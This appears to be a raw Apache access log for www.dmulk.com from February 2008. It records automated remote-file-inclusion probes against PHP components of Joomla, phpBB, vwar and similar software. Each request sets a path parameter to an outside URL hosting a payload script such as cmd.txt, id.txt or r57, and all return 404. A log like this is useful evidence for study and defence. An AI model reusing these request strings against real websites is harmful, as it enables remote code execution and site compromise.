207.58.184.170 - - [19/Feb/2008:06:41:33 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:41:43 -0800] "GET /logs/access_080123.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:41:43 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:41:43 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:41:55 -0800] "GET /logs/access_080122.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:41:56 -0800] "GET /logs/access_071214.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:41:56 -0800] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:41:57 -0800] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:42:01 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:42:02 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:42:03 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:42:04 -0800] "GET /logs/access_080120.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:42:44 -0800] "GET /logs/index.php?onlinehome=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:42:46 -0800] "GET /logs/access_080126.log/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:42:46 -0800] "GET /postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:42:46 -0800] "GET /logs/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:42:49 -0800] "GET /index.php?onlinehome=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:43:56 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:43:56 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:44:13 -0800] "GET /logs/access.log//?mosConfig_absolute_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.130.198 - - [19/Feb/2008:06:44:19 -0800] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:06:44:46 -0800] "GET /index2.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [19/Feb/2008:06:45:02 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:06:45:06 -0800] "GET /logs/access.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:06:45:07 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:06:45:08 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:06:45:46 -0800] "GET /logs/access_080106.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:06:45:53 -0800] "GET /logs/access_080130.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:45:54 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.195.66 - - [19/Feb/2008:06:46:05 -0800] "GET /logs/access_080131.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.193.162 - - [19/Feb/2008:06:46:20 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.193.162 - - [19/Feb/2008:06:46:21 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://124.0.201.20/bbs000/cmdhtml.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.193.162 - - [19/Feb/2008:06:46:27 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.ldsblvd.com/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.54.29.114 - - [19/Feb/2008:06:46:57 -0800] "GET //styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.5 - - [19/Feb/2008:06:47:17 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.169.155.140 - - [19/Feb/2008:06:48:03 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.icel.edu.mx//mambots/content/mosthumb/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:48:04 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:48:05 -0800] "GET //administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:48:07 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.188 - - [19/Feb/2008:06:48:23 -0800] "GET //administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:06:48:26 -0800] "GET /logs/access_080130.log/modules/agendax/addevent.inc.php?agendax_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:06:48:26 -0800] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:06:48:31 -0800] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [19/Feb/2008:06:48:31 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [19/Feb/2008:06:48:48 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [19/Feb/2008:06:48:48 -0800] "GET /convert/mvcw.php?vwar_root=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [19/Feb/2008:06:48:48 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
205.234.222.47 - - [19/Feb/2008:06:48:52 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:06:49:18 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:06:49:18 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:06:49:25 -0800] "GET /logs/access.log///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:06:49:26 -0800] "GET /logs///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:49:41 -0800] "GET /logs/access_080130.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:49:41 -0800] "GET /logs//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [19/Feb/2008:06:49:42 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.86.232.194 - - [19/Feb/2008:06:50:07 -0800] "GET /logs/access_080117.log/werbungFrame.php?do=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [19/Feb/2008:06:50:07 -0800] "GET /werbungFrame.php?do=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [19/Feb/2008:06:50:07 -0800] "GET /logs/werbungFrame.php?do=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.195.66 - - [19/Feb/2008:06:50:37 -0800] "GET /logs/access_080129.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.193.162 - - [19/Feb/2008:06:50:59 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.ldsblvd.com/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.193.162 - - [19/Feb/2008:06:50:59 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.ldsblvd.com/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:51:40 -0800] "GET /logs/access_080211.log/smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:51:40 -0800] "GET /smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:51:40 -0800] "GET /logs/smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:06:51:45 -0800] "GET /logs/access_080103.log///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:51:52 -0800] "GET /logs/access_080123.log//styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [19/Feb/2008:06:51:53 -0800] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [19/Feb/2008:06:51:53 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:51:53 -0800] "GET //styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:51:54 -0800] "GET /logs//styles/internal/header.php?tpl_pgb_moddir=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:06:52:14 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
89.255.3.76 - - [19/Feb/2008:06:52:14 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
216.55.147.205 - - [19/Feb/2008:06:52:18 -0800] "GET /convert/mvcw.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [19/Feb/2008:06:52:18 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [19/Feb/2008:06:52:21 -0800] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.55.147.205 - - [19/Feb/2008:06:53:01 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:53:07 -0800] "GET /logs/access_080126.log/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:06:53:13 -0800] "GET /logs/access_080211.log/smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:06:53:14 -0800] "GET /smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.93.36.240 - - [19/Feb/2008:06:53:14 -0800] "GET /logs/smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.1.47 - - [19/Feb/2008:06:53:18 -0800] "GET /logs/access_071225.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://menlowstation.net/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.68.218.20 - - [19/Feb/2008:06:53:40 -0800] "GET /logs/access_080131.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:06:53:46 -0800] "GET /logs/access_080211.log/smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:06:53:46 -0800] "GET /smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [19/Feb/2008:06:53:46 -0800] "GET /logs/smarty_config.php?root_dir=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.13.86.23 - - [19/Feb/2008:06:53:53 -0800] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.13.86.23 - - [19/Feb/2008:06:53:54 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [19/Feb/2008:06:54:17 -0800] "GET //stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.165.53 - - [19/Feb/2008:06:55:14 -0800] "GET /logs/access_080122.log//administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.wakejunkies.com/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:55:15 -0800] "GET /logs/access_080211.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:55:15 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:55:15 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:06:55:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:06:55:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
80.74.145.108 - - [19/Feb/2008:06:55:38 -0800] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.49.42 - - [19/Feb/2008:06:56:19 -0800] "GET /logs/access_071224.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://webaries.powweb.com/coretech/images/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.222.47 - - [19/Feb/2008:06:56:40 -0800] "GET /logs/access_080126.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [19/Feb/2008:06:56:40 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.222.47 - - [19/Feb/2008:06:56:40 -0800] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [19/Feb/2008:06:56:54 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.129.167.70 - - [19/Feb/2008:06:57:11 -0800] "GET /logs///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.129.167.70 - - [19/Feb/2008:06:57:16 -0800] "GET ///administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:06:58:40 -0800] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.249.193.2 - - [19/Feb/2008:06:58:41 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:06:58:57 -0800] "GET /logs/access.log/index2.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.139.79.29 - - [19/Feb/2008:06:58:58 -0800] "GET /logs/index2.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:59:03 -0800] "GET /logs/access_080123.log/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:59:03 -0800] "GET /joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.137.202.13 - - [19/Feb/2008:06:59:04 -0800] "GET /logs/joomla_Path/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.193.162 - - [19/Feb/2008:06:59:12 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.ldsblvd.com/vnc/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
